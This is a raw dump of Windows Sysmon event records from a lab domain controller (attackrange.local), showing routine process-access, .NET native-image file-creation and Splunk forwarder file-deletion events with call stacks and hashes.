21:06:44.963{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A264-60D3-F504-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.947{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A264-60D3-F504-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.947{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A264-60D3-F504-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.822{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A264-60D3-F404-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.807{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6553334987BE71E4703EA7FF2ACA802,SHA256=E88C8890765C3FE11DC00C11025C4BFBE7D9C67A6234E8119D46FC09B280AA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.791{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A264-60D3-F404-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.791{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A264-60D3-F404-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:44.666{4DB9351A-A263-60D3-F304-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1be8-0\System.Workflow.Runtime.dll2021-06-23 21:06:44.666 23542300x800000000000000022190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:44.291{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A31EB9EB5F89CBE82E0AB9C3CC3650E,SHA256=D0002AF7AEE1F12BF5D2ADBBD08D50E22CD0EA4A4081094BE0B9DDD575270177,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:45.932{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A265-60D3-F604-00000000CF01}6580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:45.916{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A265-60D3-F604-00000000CF01}6580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:45.916{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A265-60D3-F604-00000000CF01}6580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:45.901{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A3862073732D099A70965B89579E258,SHA256=6D9E7038089EB7553E7E375575A606C1FECC33C2794D1C0E07EC5AD7FFB6E156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:45.807{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A78AA825EAD510321D346E9633F1BE4,SHA256=F24863C6C938547A17B5E8C2463BC94609EA805ACC80891222B0966552A7DBB5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:45.791{4DB9351A-A264-60D3-F504-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19bc-0\System.WorkflowServices.dll2021-06-23 21:06:45.791 10341000x800000000000000022259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.978{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.978{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.978{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.978{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.963{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A266-60D3-FD04-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.963{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.947{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.947{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000022251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.947{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000022250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.947{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A266-60D3-FD04-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.947{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A266-60D3-FD04-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 